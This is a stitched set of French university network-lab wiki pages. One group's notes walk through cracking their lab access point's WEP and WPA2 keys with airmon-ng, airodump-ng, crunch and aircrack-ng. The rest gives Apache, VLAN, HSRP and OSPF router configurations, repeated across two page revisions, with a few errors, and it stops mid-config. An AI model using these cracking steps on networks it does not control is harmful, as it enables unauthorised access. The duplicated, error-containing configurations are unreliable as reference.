ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP système & reseau IMA2a5 2019/2020

2019-11-28T17:00:52Z

Jcabrald : /* Bornes Wi-Fi */

== Introduction ==

Bienvenue sur l'article wikipédia de la promotion 2017 - 2020 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]

== Répartition des binômes ==

{| class="wikitable" style="text-align:center"
! Page du groupe !! Prénom & NOM !! Nom de domaine acheté !! Certificat associé ?
|-
| [[ TP sysres IMA2a5 2019/2020 G1 | Cahier groupe n°1]]
| Fabien CAVALIER & Maxime HIRT
|[https://ima2a5-zerofun.site https://ima2a5-zerofun.site ]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G2 | Cahier groupe n°2]]
| Ekaterina ISHCHUK & Loick MOLLET
| [https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G3 | Cahier groupe n°3]]
| Quentin WEISBECKER & Pascal COINT
|[https://ima2a5-rex4ever.site https://ima2a5-rex4ever.site]
|[https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Affectation_du_certificat_sur_Gandi.net voir ici]
|-
| [[ TP sysres IMA2a5 2019/2020 G4 | Cahier groupe n°4]]
| Malick SECK & Gael WATBLED
|[https://ima2a5-wateck.site https://ima2a5-wateck.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G5 | Cahier groupe n°5]]
| Quentin VERNE & Adrien MONFILLIETTE
|[https://ima2a5-nofun.site https://ima2a5-nofun.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G6 | Cahier groupe n°6]]
| Hamza FAHIM & Jorge CABRAL-DAS-DORES
| [https://ima2a5-4fun.site https://ima2a5-4fun.site]
|
|-
|}

== Table IP VLANs ==

{| class="wikitable" style="text-align:center"
! Nom !! Vlan !! Réseau IPV4 (Routé) !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel !! IPv4 VLAN Wi-Fi (non routé)
|-
|Xen
|42
|193.48.57.160/28
|2001:660:4401:60B1::/64
|193.48.57.174
|193.48.57.173
|193.48.57.172
| ****
|-
|Groupe 1
|2
| ****
|2001:660:4401:60B2::/64
|10.60.1.254
|10.60.1.253
|10.60.1.252
|10.60.1.0/16
|-
|Groupe 2
|3
| ****
|2001:660:4401:60B3::/64
|10.60.2.254
|10.60.2.253
|10.60.2.252
|10.60.2.0/16
|-
|Groupe 3
|4
| ****
|2001:660:4401:60B4::/64
|10.60.3.254
|10.60.3.253
|10.60.3.252
|10.60.3.0/16
|-
|Groupe 4
|5
| ****
|2001:660:4401:60B5::/64
|10.60.4.254
|10.60.4.253
|10.60.4.252
|10.60.4.0/16
|-
|Groupe 5
|6
| ****
|2001:660:4401:60B6::/64
|10.60.5.254
|10.60.5.253
|10.60.5.252
|10.60.5.0/16
|-
|Groupe 6
|7
| ****
|2001:660:4401:60B7::/64
|10.60.6.254
|10.60.6.253
|10.60.6.252
|10.60.6.0/16
|-
|}

== Architecture matérielle ==

[[Fichier:Archi_IMA2A5.jpg|500px|center|thumb|© Copyright Minou]]

== Machines virtuelles ==

{| class="wikitable" style="text-align:center"
!Groupe !! Nom de la VM !! IP de la VM
|-
|Groupe 1
|ima2a5-zerofun
|193.48.57.161/28
|-
|Groupe 2
|ima2a5-mol-ish
|193.48.57.162/28
|-
|Groupe 3
|ima2a5-rex4ever
|193.48.57.163/28
|-
|Groupe 4
|ima2a5-wateck
|193.48.57.164/28
|-
|Groupe 5
|ima2a5-nofun
|193.48.57.165/28
|-
|Groupe 6
|ima2a5-4fun
|193.48.57.166/28
|-
|}

== Bornes Wi-Fi ==

{| class="wikitable" style="text-align:center"
!Groupe !! Nom de la VM !! Nom SSID !! Numéro Vlan Wifi (SSID)
|-
|Groupe 1
|ima2a5-zerofun
|SSID_ima2a5-zerofun
|2
|-
|Groupe 2
|ima2a5-mol-ish
|SSID_ima2a5-mol-ish
|3
|-
|Groupe 3
|ima2a5-rex4ever
|SSID_ima2a5-rex4ever
|4
|-
|Groupe 4
|ima2a5-wateck
|SSID_ima2a5-wateck
|5
|-
|Groupe 5
|ima2a5-nofun
|SSID_ima2a5-nofun
|6
|-
|Groupe 6
|ima2a5-4fun
|SSID_ima2a5-4fun
|7
|-
|}

== Architecture Réseau ==

Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.

=== Configuration des 2 commutateurs ===

===== Connexion =====

Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs

enable // passage en admin pour pouvoir accéder aux données du commutateur

write // Sauvegarde de la configuration et l’implanter dans le commutateur

show interface status OU sh int status // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées

configuration terminal // permets d'accéder aux interfaces et ainsi pouvoir les modifier

exit // permets de sortir du configurateur actuel (par exemple sortir de l'interface)

==== Configuration des ports du commutateur ====

Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306
- Un lien vers le routeur
- Un lien vers la borne wifi
- Un lien vers Corduan
- Un lien vers l'autre commutateur

{| class="wikitable" style="text-align: center;width: 85%;margin: auto;"
! Connexion !! E304 !! E306
|-
! scope="row" style="width: 20%"|Corduan
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Borne Wifi
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Commutateur
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Router
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
|}
}

===== Création du lien pour la borne wifi =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport //Rendre accessible la modification du port
switchport trunk encapsulation dot1q //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port
switchport mode trunk //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port
no shut //Démarre le port ou de le garder actif
exit
exit
write

===== Création du lien pour Corduan =====

enable
configure terminal
interface XXXX
switchport
switchport mode access //Rendre modifiable le port
switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port
no shutdown
exit
exit
write

===== Création du lien pour le router =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création du lien pour l'autre commutateur =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création des Vlan =====

enable
conf t
vlan 42
name Corduan
exit
exit
write

enable
conf t
vlan 2 à 7
name groupe 1 à 6
exit
exit
write

enable
conf t
vlan 130
name interconnexion
exit
exit
write

Pour supprimer un vlan il suffit de faire :
no vlan X

=== Configuration du router E304 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion

enable

configure terminal

interface XXXX
no ip address //Pas d'addresse IP associé
negotiation auto //Détermine automatiquement la vitesse de transfert
media-type RJ45 //Type de connexion (ici RJ45)

Voici les vlan associé à nos groupes :

service instance 2 ethernet // création d'un vlan 2 dans cette interface
encapsulation dot1q 2 // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk
rewrite ingress tag pop 1 symmetric // retire le tag du vlan
bridge-domain 2 //création d'un bridge domaine interface (BDI) attribué au chiffre 2

service instance 3 ethernet
encapsulation dot1q 3
rewrite ingress tag pop 1 symmetric
bridge-domain 3

service instance 4 ethernet
encapsulation dot1q 4
rewrite ingress tag pop 1 symmetric
bridge-domain 4

service instance 5 ethernet
encapsulation dot1q 5
rewrite ingress tag pop 1 symmetric
bridge-domain 5

service instance 6 ethernet
encapsulation dot1q 6
rewrite ingress tag pop 1 symmetric
bridge-domain 6

service instance 7 ethernet
encapsulation dot1q 7
rewrite ingress tag pop 1 symmetric
bridge-domain 7

Voici le vlan associé à l'interconnexion :

service instance 42 ethernet
encapsulation dot1q 42
rewrite ingress tag pop 1 symmetric
bridge-domain 42

====== Vers le SR 32 ======
interface XXXX
no ip address
negotiation auto
service instance 130 ethernet
encapsulation dot1q 130
bridge-domain 130

===== Configuration des BDI =====

conf t
interface BDI2
ip address 10.60.1.254 255.255.255.000 //Attribut l'addresse IPV4 pour le routeur ainsi que son mask
standby version 2 //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1
standby 3 ip 10.60.1.252 //Donne l'addresse IPV4 du routeur virtuelle pour le HSRP
standby 3 preempt // Activation du HSRP
ipv6 address 2001:660:4401:60B3::/64 eui-64 //Attribut l'addresse IPV6
ipv6 enable //Active l'addressage IPV6
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900 //Donner un préfixe IPV6 à chaque machine
ipv6 nd router-preference high //IPV6 sera la route de préférence par défaut avec une forte probabilitée
exit

interface BDI3
ip address 10.60.2.254 255.255.255.000
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI4
ip address 10.60.3.254 255.255.255.000
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI5
ip address 10.60.4.254 255.255.255.000
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI6
ip address 10.60.5.254 255.255.255.000
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI7
ip address 10.60.6.254 255.255.255.000
standby version 2
standby 6 ip 10.60.6.252
standby 6 preempt
ipv6 address 2001:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI42
ip address 193.48.57.173 255.255.255.240
standby version 2
standby 7 ip 193.48.57.172
standby 7 preempt
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
exit

int vlan 130
ip address 192.168.222.1 255.255.255.248
ipv6 address fe80::2 link-local
ipv6 enable
ipv6 rip tpima2a5 enable
exit
ip rooting

exit
write

==== Interconnexion du réseau IPV4 ====

Se le faire expliquer parce que rien compris

configure terminal
ip routing
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.254
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

==== Sécurisation du réseau ====

Question pour Redon addresse Ip à définir

conf t
int XXXX
ip address 10.10.10.2 255.255.255.0
vrrp 1 ip 10.10.10.3
vrrp 1 preempt //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place
vrrp 1 priority 100 //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité
exit
exit
write

=== Configuration du router E306 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio

conf t
interface Vlan2
ip address 10.60.1.253 255.255.255.0
ipv6 address 2001:660:4401:60B2::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 2 ip 10.60.1.252
standby 2 preempt
exit

interface Vlan3
ip address 10.60.2.253 255.255.255.0
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
exit

interface Vlan4
ip address 10.60.3.253 255.255.255.0
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
exit

interface Vlan5
ip address 10.60.4.253 255.255.255.0
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
exit

interface Vlan6
ip address 10.60.5.253 255.255.255.0
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
exit

interface Vlan7
ip address 10.60.6.253 255.255.255.0
ipv6 address 2201:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 7 ip 10.60.6.252
standby 7 preempt
exit

interface Vlan42
ip address 193.48.57.174 255.255.255.0
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 42 ip 193.48.57.172
standby 42 preempt
exit

interface Vlan130
ip address 192.168.222.2 255.255.255.248
ipv6 address FE80::42:2 link-local
ipv6 enable
exit

exit
write

==== Interconnexion du réseau IPV4 ====

configure terminal
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.253
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

TP système & reseau IMA2a5 2019/2020

2019-11-28T17:00:40Z

Jcabrald : /* Bornes Wi-Fi */

== Introduction ==

Bienvenue sur l'article wikipédia de la promotion 2017 - 2020 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]

== Répartition des binômes ==

{| class="wikitable" style="text-align:center"
! Page du groupe !! Prénom & NOM !! Nom de domaine acheté !! Certificat associé ?
|-
| [[ TP sysres IMA2a5 2019/2020 G1 | Cahier groupe n°1]]
| Fabien CAVALIER & Maxime HIRT
|[https://ima2a5-zerofun.site https://ima2a5-zerofun.site ]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G2 | Cahier groupe n°2]]
| Ekaterina ISHCHUK & Loick MOLLET
| [https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G3 | Cahier groupe n°3]]
| Quentin WEISBECKER & Pascal COINT
|[https://ima2a5-rex4ever.site https://ima2a5-rex4ever.site]
|[https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Affectation_du_certificat_sur_Gandi.net voir ici]
|-
| [[ TP sysres IMA2a5 2019/2020 G4 | Cahier groupe n°4]]
| Malick SECK & Gael WATBLED
|[https://ima2a5-wateck.site https://ima2a5-wateck.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G5 | Cahier groupe n°5]]
| Quentin VERNE & Adrien MONFILLIETTE
|[https://ima2a5-nofun.site https://ima2a5-nofun.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G6 | Cahier groupe n°6]]
| Hamza FAHIM & Jorge CABRAL-DAS-DORES
| [https://ima2a5-4fun.site https://ima2a5-4fun.site]
|
|-
|}

== Table IP VLANs ==

{| class="wikitable" style="text-align:center"
! Nom !! Vlan !! Réseau IPV4 (Routé) !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel !! IPv4 VLAN Wi-Fi (non routé)
|-
|Xen
|42
|193.48.57.160/28
|2001:660:4401:60B1::/64
|193.48.57.174
|193.48.57.173
|193.48.57.172
| ****
|-
|Groupe 1
|2
| ****
|2001:660:4401:60B2::/64
|10.60.1.254
|10.60.1.253
|10.60.1.252
|10.60.1.0/16
|-
|Groupe 2
|3
| ****
|2001:660:4401:60B3::/64
|10.60.2.254
|10.60.2.253
|10.60.2.252
|10.60.2.0/16
|-
|Groupe 3
|4
| ****
|2001:660:4401:60B4::/64
|10.60.3.254
|10.60.3.253
|10.60.3.252
|10.60.3.0/16
|-
|Groupe 4
|5
| ****
|2001:660:4401:60B5::/64
|10.60.4.254
|10.60.4.253
|10.60.4.252
|10.60.4.0/16
|-
|Groupe 5
|6
| ****
|2001:660:4401:60B6::/64
|10.60.5.254
|10.60.5.253
|10.60.5.252
|10.60.5.0/16
|-
|Groupe 6
|7
| ****
|2001:660:4401:60B7::/64
|10.60.6.254
|10.60.6.253
|10.60.6.252
|10.60.6.0/16
|-
|}

== Architecture matérielle ==

[[Fichier:Archi_IMA2A5.jpg|500px|center|thumb|© Copyright Minou]]

== Machines virtuelles ==

{| class="wikitable" style="text-align:center"
!Groupe !! Nom de la VM !! IP de la VM
|-
|Groupe 1
|ima2a5-zerofun
|193.48.57.161/28
|-
|Groupe 2
|ima2a5-mol-ish
|193.48.57.162/28
|-
|Groupe 3
|ima2a5-rex4ever
|193.48.57.163/28
|-
|Groupe 4
|ima2a5-wateck
|193.48.57.164/28
|-
|Groupe 5
|ima2a5-nofun
|193.48.57.165/28
|-
|Groupe 6
|ima2a5-4fun
|193.48.57.166/28
|-
|}

== Bornes Wi-Fi ==

{| class="wikitable" style="text-align:center"
!Groupe !! Nom de la VM !! Nom SSID !! Numéro Vlan Wifi ( SSID )
|-
|Groupe 1
|ima2a5-zerofun
|SSID_ima2a5-zerofun
|2
|-
|Groupe 2
|ima2a5-mol-ish
|SSID_ima2a5-mol-ish
|3
|-
|Groupe 3
|ima2a5-rex4ever
|SSID_ima2a5-rex4ever
|4
|-
|Groupe 4
|ima2a5-wateck
|SSID_ima2a5-wateck
|5
|-
|Groupe 5
|ima2a5-nofun
|SSID_ima2a5-nofun
|6
|-
|Groupe 6
|ima2a5-4fun
|SSID_ima2a5-4fun
|7
|-
|}

== Architecture Réseau ==

Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.

=== Configuration des 2 commutateurs ===

===== Connexion =====

Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs

enable // passage en admin pour pouvoir accéder aux données du commutateur

write // Sauvegarde de la configuration et l’implanter dans le commutateur

show interface status OU sh int status // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées

configuration terminal // permets d'accéder aux interfaces et ainsi pouvoir les modifier

exit // permets de sortir du configurateur actuel (par exemple sortir de l'interface)

==== Configuration des ports du commutateur ====

Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306
- Un lien vers le routeur
- Un lien vers la borne wifi
- Un lien vers Corduan
- Un lien vers l'autre commutateur

{| class="wikitable" style="text-align: center;width: 85%;margin: auto;"
! Connexion !! E304 !! E306
|-
! scope="row" style="width: 20%"|Corduan
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Borne Wifi
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Commutateur
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Router
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
|}
}

===== Création du lien pour la borne wifi =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport //Rendre accessible la modification du port
switchport trunk encapsulation dot1q //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port
switchport mode trunk //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port
no shut //Démarre le port ou de le garder actif
exit
exit
write

===== Création du lien pour Corduan =====

enable
configure terminal
interface XXXX
switchport
switchport mode access //Rendre modifiable le port
switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port
no shutdown
exit
exit
write

===== Création du lien pour le router =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création du lien pour l'autre commutateur =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création des Vlan =====

enable
conf t
vlan 42
name Corduan
exit
exit
write

enable
conf t
vlan 2 à 7
name groupe 1 à 6
exit
exit
write

enable
conf t
vlan 130
name interconnexion
exit
exit
write

Pour supprimer un vlan il suffit de faire :
no vlan X

=== Configuration du router E304 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion

enable

configure terminal

interface XXXX
no ip address //Pas d'addresse IP associé
negotiation auto //Détermine automatiquement la vitesse de transfert
media-type RJ45 //Type de connexion (ici RJ45)

Voici les vlan associé à nos groupes :

service instance 2 ethernet // création d'un vlan 2 dans cette interface
encapsulation dot1q 2 // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk
rewrite ingress tag pop 1 symmetric // retire le tag du vlan
bridge-domain 2 //création d'un bridge domaine interface (BDI) attribué au chiffre 2

service instance 3 ethernet
encapsulation dot1q 3
rewrite ingress tag pop 1 symmetric
bridge-domain 3

service instance 4 ethernet
encapsulation dot1q 4
rewrite ingress tag pop 1 symmetric
bridge-domain 4

service instance 5 ethernet
encapsulation dot1q 5
rewrite ingress tag pop 1 symmetric
bridge-domain 5

service instance 6 ethernet
encapsulation dot1q 6
rewrite ingress tag pop 1 symmetric
bridge-domain 6

service instance 7 ethernet
encapsulation dot1q 7
rewrite ingress tag pop 1 symmetric
bridge-domain 7

Voici le vlan associé à l'interconnexion :

service instance 42 ethernet
encapsulation dot1q 42
rewrite ingress tag pop 1 symmetric
bridge-domain 42

====== Vers le SR 32 ======
interface XXXX
no ip address
negotiation auto
service instance 130 ethernet
encapsulation dot1q 130
bridge-domain 130

===== Configuration des BDI =====

conf t
interface BDI2
ip address 10.60.1.254 255.255.255.000 //Attribut l'addresse IPV4 pour le routeur ainsi que son mask
standby version 2 //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1
standby 3 ip 10.60.1.252 //Donne l'addresse IPV4 du routeur virtuelle pour le HSRP
standby 3 preempt // Activation du HSRP
ipv6 address 2001:660:4401:60B3::/64 eui-64 //Attribut l'addresse IPV6
ipv6 enable //Active l'addressage IPV6
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900 //Donner un préfixe IPV6 à chaque machine
ipv6 nd router-preference high //IPV6 sera la route de préférence par défaut avec une forte probabilitée
exit

interface BDI3
ip address 10.60.2.254 255.255.255.000
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI4
ip address 10.60.3.254 255.255.255.000
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI5
ip address 10.60.4.254 255.255.255.000
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI6
ip address 10.60.5.254 255.255.255.000
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI7
ip address 10.60.6.254 255.255.255.000
standby version 2
standby 6 ip 10.60.6.252
